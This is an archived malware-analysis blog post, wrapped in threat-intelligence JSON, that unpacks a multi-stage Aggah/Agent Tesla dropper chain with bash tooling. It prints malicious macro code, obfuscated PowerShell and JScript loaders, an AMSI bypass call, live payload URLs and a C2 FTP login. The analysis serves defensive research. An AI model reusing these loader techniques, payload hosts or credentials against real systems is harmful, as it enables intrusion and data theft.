{
	"id": "9ae09140-78e7-42f5-a559-f92ec9b92219",
	"created_at": "2026-04-06T00:18:06.362249Z",
	"updated_at": "2026-04-10T03:33:12.488763Z",
	"deleted_at": null,
	"sha1_hash": "c980fda2111ab25fa8c4978f3686151c641de920",
	"title": "(Ab)using bash-fu to analyze recent Aggah sample",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 249041,
	"plain_text": "(Ab)using bash-fu to analyze recent Aggah sample\r\nPublished: 2020-02-26 · Archived: 2026-04-05 18:16:15 UTC\r\nIntro\r\nRecently one of my generic signatures for malformed documents was hit, this type of malformation was used mostly by\r\nZebrocy so i was curious whats cooking. After some analysis it turns out that last stage uses tools that are publicly attributed\r\nto Aggah, but to get that we need to tear through multiple layers of downloading scripts. We probably could just run our lure\r\ndocument and collect dropped binaries in a sandbox but where is fun of that? Let’s do some work and abuse bash in order to\r\nobtain next stages!\r\nLure document\r\nFile that cought my attention is 47625e693220465ced292aefd7c61fffc77dedd01618432da177a3b89525be9b uploaded with a\r\nname Updated Pre-Contract.docx from Honk Kong. File is broken its missing one byte and libreoffice refuses to open it,\r\nbut we can easly fix that!\r\n(cat /tmp/b93291c5560551ffd4e7f1545c07f403.bin ; printf \"\\x00\" ) \u003e fix.doc\r\nand we are presented with very blurred jpg embedded in document\r\nwe can also skip fixing phase and use 7zip to unpack content of the file, but we need screenshot of a doc right? ;]\r\nAnyhow looking into file with 7zip is always a good idea which may give a clue what to look for\r\nPath = /tmp/b93291c5560551ffd4e7f1545c07f403.bin\r\nType = zip\r\nERRORS:\r\nUnexpected end of archive\r\nPhysical Size = 39441\r\n Date Time Attr Size Compressed Name\r\nhttps://blog.malwarelab.pl/posts/basfu_aggah/\r\nPage 1 of 8\n\n------------------- ----- ------------ ------------ ------------------------\r\n1980-01-01 00:00:00 ..... 2017 414 [Content_Types].xml\r\n1980-01-01 00:00:00 ..... 737 254 _rels/.rels\r\n1980-01-01 00:00:00 ..... 3781 1146 word/document.xml\r\n1980-01-01 00:00:00 ..... 1509 315 word/_rels/document.xml.rels\r\n1980-01-01 00:00:00 ..... 8814 8814 word/media/image1.jpg\r\n1980-01-01 00:00:00 ..... 6795 1571 word/theme/theme1.xml\r\n1980-01-01 00:00:00 ..... 2938 1065 word/settings.xml\r\n1980-01-01 00:00:00 ..... 213 151 customXml/item1.xml\r\n1980-01-01 00:00:00 ..... 335 243 customXml/itemProps1.xml\r\n1980-01-01 00:00:00 ..... 58402 7000 customXml/item2.xml\r\n1980-01-01 00:00:00 ..... 1088 410 customXml/itemProps2.xml\r\n1980-01-01 00:00:00 ..... 9799 1724 customXml/item3.xml\r\n1980-01-01 00:00:00 ..... 486 292 customXml/itemProps3.xml\r\n1980-01-01 00:00:00 ..... 31158 2054 word/numbering.xml\r\n1980-01-01 00:00:00 ..... 55478 5110 word/styles.xml\r\n1980-01-01 00:00:00 ..... 655 295 word/webSettings.xml\r\n1980-01-01 00:00:00 ..... 2480 584 word/fontTable.xml\r\n1980-01-01 00:00:00 ..... 746 373 docProps/core.xml\r\n1980-01-01 00:00:00 ..... 997 476 docProps/app.xml\r\n1980-01-01 00:00:00 ..... 1036 362 docProps/custom.xml\r\n1980-01-01 00:00:00 ..... 296 194 customXml/_rels/item1.xml.rels\r\n1980-01-01 00:00:00 ..... 296 194 customXml/_rels/item2.xml.rels\r\n1980-01-01 00:00:00 ..... 296 195 customXml/_rels/item3.xml.rels\r\n2020-02-23 22:41:26 ..... 369 224 word/_rels/settings.xml.rels\r\n------------------- ----- ------------ ------------ ------------------------\r\n2020-02-23 22:41:26 190721 33460 24 files\r\nWhat stands out immediately is a date of word/_rels/settings.xml.rels so this doc is most likely abusing Ole2Link property\r\nto load remote content,\r\n$ extrOle2Link.py /tmp/b93291c5560551ffd4e7f1545c07f403.bin\r\n[!] broken zip - missing 1 bytes\r\n[+] HTTP-Ole2Link in http://office-archives.duckdns.org/cloud/clearance.rtf?raw=true in file word/_rels/settings.xml.rels\r\nAnd indeed it does. You can find this simple script here\r\nRTF - clearance.rtf\r\nWe got a next stage 17a8d46df8cdf7db3f9996a25dce7c78abb0cef0d7d55d94d39caf880801466b . Lets look inside!\r\nid |index |OLE Object\r\n---+----------+---------------------------------------------------------------\r\n0 |00002CADh |format_id: 2 (Embedded)\r\n | |class name: 'Excel.Sheet.8'\r\n | |data size: 39936\r\n | |MD5 = 'bf1d62dff81856a2784046b4d3eeab67'\r\n | |CLSID: 00020820-0000-0000-C000-000000000046\r\n | |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)\r\n(...)\r\n---+----------+---------------------------------------------------------------\r\n9 |000F73F1h |format_id: 2 (Embedded)\r\n | |class name: 'Excel.Sheet.8'\r\n | |data size: 39936\r\n | |MD5 = 'bb74ebb70450688af0c862b46c427eec'\r\n | |CLSID: 00020820-0000-0000-C000-000000000046\r\n | |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)\r\n---+----------+---------------------------------------------------------------\r\nUgh a lot, but all of them contain the same macro,\r\nPrivate Sub Workbook_BeforeClose(Cancel As Boolean)\r\n'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox\r\n'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox\r\n'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox\r\nhttps://blog.malwarelab.pl/posts/basfu_aggah/\r\nPage 2 of 8\n\n'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox\r\nWorksheets(1).Activate\r\nA = Range(\"C3\").Comment.Text\r\ncv = StrReverse(Range(\"C4\").Comment.Text)\r\nCall CC0(A, cv)\r\nEnd Sub\r\nFunction CC0(Str, cv)\r\n'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox\r\nSet BMMMEWEUUERTRT = CreateObject(cv)\r\nBMMMEWEUUERTRT.Exec (StrReverse(Str))\r\nEnd Function\r\nHere we should propably turn into python library that can view or manipulate xml files such as xlrd but this time we are\r\nlucky, applying strings(1) on ole files quickly yields an powershell code\r\nllehS.tpircSW\u003c\r\n)0,\"\"\")'sj.duolc\\'+ 'ATADPPA:vne$'(ssecorp-trats ;XEI|')''sj.duolc\\''+''ATADPPA:vne$'',''sj.nitup/ADN/rg.wercsutats.www//:\r\nWindows UserT\r\nafter reversing string, we got proper code,\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'\r\nAll of the OLE files have the same ps payload but we should verify that!\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\nJScript - Putin.js\r\nNext stage ( 854a0a9603b288cdf01fdcd0cc7feffb8393d35a80fca6ad981575cbe207aee4 ) is a JScript, lets take a look.\r\nf=\"K|'' nioj- u4ju435h43u3huhufdhnj$]][rahc[;)77,421,93,93,23,0mossad,501,mossad1,601,54,23,5mossad,4mossad,79,401,76,501\r\nf=f+\"63,23,16,23,801,mossad1,99,mossad1,6mossad,mossad1,4mossad,08,121,6mossad,501,4mossad,7mossad,99,101,38,85,85,39,4mos\r\nAT(\"Powershell \" + REVERSE(replaceAll(f)))\r\nvar CurrentDirectory =WScript.ScriptFullName\r\nAT(\"Powershell \" +\"Remove-Item '\" + CurrentDirectory+\"'\")\r\nfunction AT(strCommand){\r\nvar strComputer = \".\";\r\n var strCommand = strCommand;\r\n var objWMIService = GetObject(\"winmgmts:\\\\\\\\\" + strComputer +\r\n\"\\\\root\\\\CIMV2\");\r\n var objProcess = objWMIService.Get(\"Win32_Process\");\r\n var objInParam =\r\nobjProcess.Methods_(\"Create\").inParameters.SpawnInstance_();\r\n var objStartup =\r\nobjWMIService.Get(\"Win32_ProcessStartup\").SpawnInstance_();\r\n objStartup.ShowWindow = 0;\r\nhttps://blog.malwarelab.pl/posts/basfu_aggah/\r\nPage 3 of 8\n\nobjInParam.CommandLine = strCommand;\r\n objInParam.ProcessStartupInformation = objStartup;\r\n var objOutParams = objWMIService.ExecMethod( \"Win32_Process\",\r\n\"Create\", objInParam );\r\n}\r\nfunction replaceAll(str) {\r\n return str.split(\"mossad\").join(\"11\");\r\nThis script will fire encoded powershell and clean all files dropped after it execution. Using WMI instead ordinarily\r\nspawning a cmd.exe is a nice addition. Whats inside encoded blob?\r\n$ cat putin.js | grep 'f=' | cut -d'\"' -f2 | tr -d \"\\n\" | sed -e's/mossad/11/g'|rev |cut -d';' -f2|cut -d'(' -f2 | tr -d\r\n$Tbone='*EX'.replace('*','I');sal M $Tbone;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$p2\r\nWell another downloader.\r\nPowershell - fact.jpg\r\nfact.jpg ( 59012e676ed866ba013b1d950d1ef0558d7ea09e0a764ff65ee5b43663e918ea ) is just a text file with hex encoded\r\npowershell separated by dashes\r\n00000000: 3636 2d37 352d 3645 2d36 332d 3734 2d36 66-75-6E-63-74-6\r\n00000010: 392d 3646 2d36 452d 3230 2d35 352d 3445 9-6F-6E-20-55-4E\r\n00000020: 2d37 302d 3631 2d34 332d 3330 2d36 422d -70-61-43-30-6B-00000030: 3333 2d33 332d 3333 2d33 332d 3333 2d33 33-33-33-33-33-3\r\n00000040: 302d 3330 2d33 302d 3330 2d33 312d 3331 0-30-30-30-31-31\r\n00000050: 2d33 342d 3337 2d33 352d 3335 2d33 352d -34-37-35-35-35-\r\n00000060: 3230 2d37 422d 3044 2d30 412d 3044 2d30 20-7B-0D-0A-0D-0\r\n00000070: 412d 3039 2d35 422d 3433 2d36 442d 3634 A-09-5B-43-6D-64\r\n00000080: 2d36 432d 3635 2d37 342d 3432 2d36 392d -6C-65-74-42-69-\r\n00000090: 3645 2d36 342d 3639 2d36 452d 3637 2d32 6E-64-69-6E-67-2\r\nlets decode it.\r\n$ cat fact.jpg | tr \"-\" \"\\n\" | while read n ; do chr $((16#$n)); done \u003e x.ps1\r\nHere we need to cheat a little and abandon bash as its very slow to decode this big file (4.7MB) byte-by-byte. So we turn to\r\npython for help\r\ncat fact.jpg | python2 -c 'import sys; print \"\".join(map(lambda x: chr(int(x,16)),sys.stdin.read().split(\"-\")))' \u003e x.p\r\nhere is cleared code of the script\r\nfunction UNpaC0k3333300001147555 {\r\n[CmdletBinding()]\r\n Param ([byte[]] $byteArray)\r\n \r\nProcess {\r\n Write-Verbose \"Get-DecompressedByteArray\"\r\n $input = New-Object System.IO.MemoryStream( , $byteArray )\r\n $output = New-Object System.IO.MemoryStream\r\n $01774000 = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)\r\n $puffpass = New-Object byte[](1024)\r\n while($true){\r\n $read = $01774000.Read($puffpass, 0, 1024)\r\n if ($read -le 0){break}\r\n $output.Write($puffpass, 0, $read)\r\n }\r\n \r\n \r\n[byte[]] $bout333 = $output.ToArray()\r\n Write-Output $bout333\r\nhttps://blog.malwarelab.pl/posts/basfu_aggah/\r\nPage 4 of 8\n\n}\r\n}\r\n$t0='DEX'.replace('D','I');sal g $t0;[Byte[]]$MNB=('@!1F,@!8B,@!08,@!00,@!00...').replace('@!','0x'))| g;\r\n[Byte[]]$blindB=('@!1F,@!8B,@!08...').replace('@!','0x'))| g\r\n[byte[]]$deblindB = UNpaC0k3333300001147555 $blindB\r\n$blind=[System.Reflection.Assembly]::Load($deblindB)\r\n[Amsi]::Bypass()\r\n[byte[]]$decompressedByteArray = UNpaC0k3333300001147555 $MNB\r\n[Byte[]]$MNB2=('@!4D,@!5A...').replace('@!','0x'))| g\r\n$t=[System.Reflection.Assembly]::Load($decompressedByteArray)\r\n[rOnAlDo]::ChRiS('InstallUtil.exe',$MNB2)\r\nThis script will load into memory 3 binaries, two of them compressed one not, based on a script we can assume that the last\r\none is the final payload and others are used for loading. Lets extract them.\r\ncat x.ps1 | grep 'blind' | head -n1 | cut -d \"'\" -f2 | sed -e 's/@!//g' | python2 -c 'import sys;sys.stdout.write(\"\".join\r\ncat x.ps1 | grep 'MNB' | head -n1 | cut -d \"'\" -f2 | sed -e 's/@!//g' | python2 -c 'import sys;sys.stdout.write(\"\".join(ma\r\ncat x.ps1 | grep 'MNB2' | head -n1 | cut -d \"'\" -f2 | sed -e 's/@!//g' | python2 -c 'import sys;sys.stdout.write(\"\".join(m\r\nEndGame\r\nName Hash Type Comment\r\namsi.bin e4d14ba73670184066a00cf5d3361580f6c4fbc5d0862a90278d82e95426faa5\r\nPE32\r\nexecutable\r\n(DLL)\r\n(console)\r\nIntel\r\n80386\r\nMono/.Net\r\nassembly,\r\nfor MS\r\nWindows\r\nPacked\r\nwith\r\nConfuserEx\r\nv1.0.0\r\nloader.bin 8ed29945294e0ba0ae9d5c94c3871dfb00eb9c32b2c7a7704005b31642977a02\r\nPE32\r\nexecutable\r\n(DLL)\r\n(console)\r\nIntel\r\n80386\r\nMono/.Net\r\nassembly,\r\nfor MS\r\nWindows\r\nPacked\r\nwith\r\nUnknown\r\nObfuscator\r\npayload.bin 4cd35bcc7793a04daa0c20774ff2a60c3f1ae693964011cb34d13544dda8b500\r\nPE32\r\nexecutable\r\n(GUI)\r\nIntel\r\n80386\r\nMono/.Net\r\nassembly,\r\nfor MS\r\nWindows\r\nPacked\r\nwith\r\nConfuserEx\r\nWhile dealing with .NET malware dnSpy is your best friend, and while it doesn’t have a flashy gui when used under Linux\r\nsystems we can still use it to quickly asses whats going on using its console version and mono. After decompilation and\r\nlooking into \u003cModule\u003e.cs file we can see a control flow obfuscation known as CFG flattening typical to ConfuserEX so\r\nlets remove it using modifed de4dot. Much better, but still nothing obvious to determine family and C2 address. At the top\r\nof the now cleared \u003cModule\u003e.cs we can see a decryption function\r\nhttps://blog.malwarelab.pl/posts/basfu_aggah/\r\nPage 5 of 8\n\ninternal static string smethod_0(int int_0)\r\n{\r\n object[] array = \u003cModule\u003e.object_0;\r\n if (Assembly.GetExecutingAssembly() == Assembly.GetCallingAssembly())\r\n {\r\n byte[] array2 = new byte[32];\r\n byte[] array3 = new byte[16];\r\n int num = int_0 \u003e\u003e 2;\r\n num = num - 8 + 673 - 34893;\r\n num = (num ^ 673 ^ 4398);\r\n num -= 831;\r\n num = (num - 673) / 8;\r\n uint[] array4 = (uint[])array[num];\r\n byte[] array5 = new byte[array4.Length * 4];\r\n Buffer.BlockCopy(array4, 0, array5, 0, array4.Length * 4);\r\n byte[] array6 = array5;\r\n int num2 = array6.Length - 48;\r\n byte[] array7 = new byte[num2];\r\n Buffer.BlockCopy(array6, 0, array2, 0, 32);\r\n Buffer.BlockCopy(array6, 32, array3, 0, 16);\r\n Buffer.BlockCopy(array6, 48, array7, 0, num2);\r\n return Encoding.UTF8.GetString(\u003cModule\u003e.smethod_1(array7, array2, array3));\r\n }\r\n return \"\";\r\n}\r\n// Token: 0x06000003 RID: 3 RVA: 0x00011150 File Offset: 0x0000F350\r\ninternal static byte[] smethod_1(byte[] byte_0, byte[] byte_1, byte[] byte_2)\r\n{\r\n Rijndael rijndael = Rijndael.Create();\r\n rijndael.Key = byte_1;\r\n rijndael.IV = byte_2;\r\n return rijndael.CreateDecryptor().TransformFinalBlock(byte_0, 0, byte_0.Length);\r\n}\r\nand a huge blob of ints shortly after, lets make an educated guess and try to decode this blob.\r\ncat JKHLDqkYnadvWavArpqrFZCbXEpmNqbrFOBfl/\\\u003cModule\\\u003e.cs | grep -Pzo \"new uint\\[\\]\\n\\s+{[^}]+}\"| sed -e 's#.new uint..##'\r\nYou can find those strings here. In those strings we can find bunch of hints from which software this malware steales data\r\nfrom but mosty we can find informations about C\u0026C server.\r\n...\r\nftp://ftp.metris3d.hu/\r\nseed@metris3d.hu\r\nTeam2318@\r\n...\r\nfurther examination of strings and code reveal its Agent Tesla.\r\nAttribution\r\nAt that point i had no idea what I’m actually look at, so i start pivoting - Agent Tesla with confuser is way to generic but\r\nloader with a unknown packer can be something unique. If you look closely into Guwav/Properties/AssemblyInfo.cs you\r\ncan find very strange definition\r\n[assembly: AssemblyTrademark(\"kernel32||CreateProcessA||GetThreadContext||Wow64GetThreadContext||SetThreadContext||Wow64S\r\nthis sounds like a great pivot! Indeed it is, soon after querying for\r\nmetadata:\"kernel32||CreateProcessA||GetThreadContext||Wow64GetThreadContext||SetThreadContext||Wow64SetThreadContext||ReadProcessMemory|\r\non VT we will find this\r\nhttps://blog.malwarelab.pl/posts/basfu_aggah/\r\nPage 6 of 8\n\nWhile this is hardly any proof, its a hint for a direction. After examine the files from VT and the one described in Yoroi’s\r\nblog post and comparing to my loader i reached a conclusion that it is indeed the same one. However this loader can still be\r\nused by other parties, but while this campaign is quite different that the one previously described one can find some\r\nsimilarities such ash\r\nuse of off the shelf .NET RAT\r\nheavy use of StrReverse in early stages\r\nMixture of VBS, Powershell and JScript\r\nWay of encoding payload in later stages\r\nConsistent way of using ConfuserEX\r\nWith all that in mind i would say with medium confidence that this is another campaign from Aggah stable\r\nConclusion\r\nWhen dealing with a many script based droppers using bash tools such as grep, send and awk can be a tremendous help, and\r\nsince most of those encodings are used in in one or two campaigns there is no real need to create tons of throw-away scripts.\r\nThis static method of analysis is obviously more tedious and time consuming than throwing things into sandbox and just\r\nread the results it may reveal artifacts that would be missed in automated analysis. Artifacts such as childish use of putin\r\nand mossad keywords. Another curious thing that we would probably missed is password for ftp account, same password\r\nwas mentioned in a PAN’s Unit42 blog post few years back, this password is unique enough to give a clue of possible\r\nhistory of the group or operator.\r\nAnalysis Artifacts - Hashes, domains, urls, etc\r\nURL:\r\nhttp://office-archives.duckdns.org/cloud/clearance.rtf\r\nhttp://www.statuscrew.gr/NDA/putin.js\r\nhttp://janvierassocies.fr/office/fact.jpg\r\nftp:///ftp.metris3d.hu/\r\nHASHES:\r\n47625e693220465ced292aefd7c61fffc77dedd01618432da177a3b89525be9b\r\n17a8d46df8cdf7db3f9996a25dce7c78abb0cef0d7d55d94d39caf880801466b\r\n854a0a9603b288cdf01fdcd0cc7feffb8393d35a80fca6ad981575cbe207aee4\r\n59012e676ed866ba013b1d950d1ef0558d7ea09e0a764ff65ee5b43663e918ea\r\ne4d14ba73670184066a00cf5d3361580f6c4fbc5d0862a90278d82e95426faa5\r\n8ed29945294e0ba0ae9d5c94c3871dfb00eb9c32b2c7a7704005b31642977a02\r\n4cd35bcc7793a04daa0c20774ff2a60c3f1ae693964011cb34d13544dda8b500\r\nFILE NAMES:\r\nUpdated Pre-Contract.docx\r\nInstallUtil.exe\r\ncloud.js\r\nclearance.rtf\r\nC2 LOGIN:\r\nseed@metris3d.hu\r\nhttps://blog.malwarelab.pl/posts/basfu_aggah/\r\nPage 7 of 8\n\nTeam2318@\r\nSource: https://blog.malwarelab.pl/posts/basfu_aggah/\r\nhttps://blog.malwarelab.pl/posts/basfu_aggah/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.malwarelab.pl/posts/basfu_aggah/"
	],
	"report_names": [
		"basfu_aggah"
	],
	"threat_actors": [
		{
			"id": "b0d34dd6-ee90-483b-bb6c-441332274160",
			"created_at": "2022-10-25T16:07:23.296754Z",
			"updated_at": "2026-04-10T02:00:04.526403Z",
			"deleted_at": null,
			"main_name": "Aggah",
			"aliases": [
				"Operation Red Deer",
				"Operation Roma225"
			],
			"source_name": "ETDA:Aggah",
			"tools": [
				"AgenTesla",
				"Agent Tesla",
				"AgentTesla",
				"Aggah",
				"Atros2.CKPN",
				"Bladabindi",
				"Jorik",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"Negasteal",
				"Origin Logger",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"Warzone",
				"Warzone RAT",
				"ZPAQ",
				"Zurten",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2",
			"created_at": "2023-06-20T02:02:10.254614Z",
			"updated_at": "2026-04-10T02:00:03.365336Z",
			"deleted_at": null,
			"main_name": "Hagga",
			"aliases": [
				"TH-157",
				"Aggah"
			],
			"source_name": "MISPGALAXY:Hagga",
			"tools": [
				"Agent Tesla"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434686,
	"ts_updated_at": 1775791992,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c980fda2111ab25fa8c4978f3686151c641de920.pdf",
		"text": "https://archive.orkl.eu/c980fda2111ab25fa8c4978f3686151c641de920.txt",
		"img": "https://archive.orkl.eu/c980fda2111ab25fa8c4978f3686151c641de920.jpg"
	}
}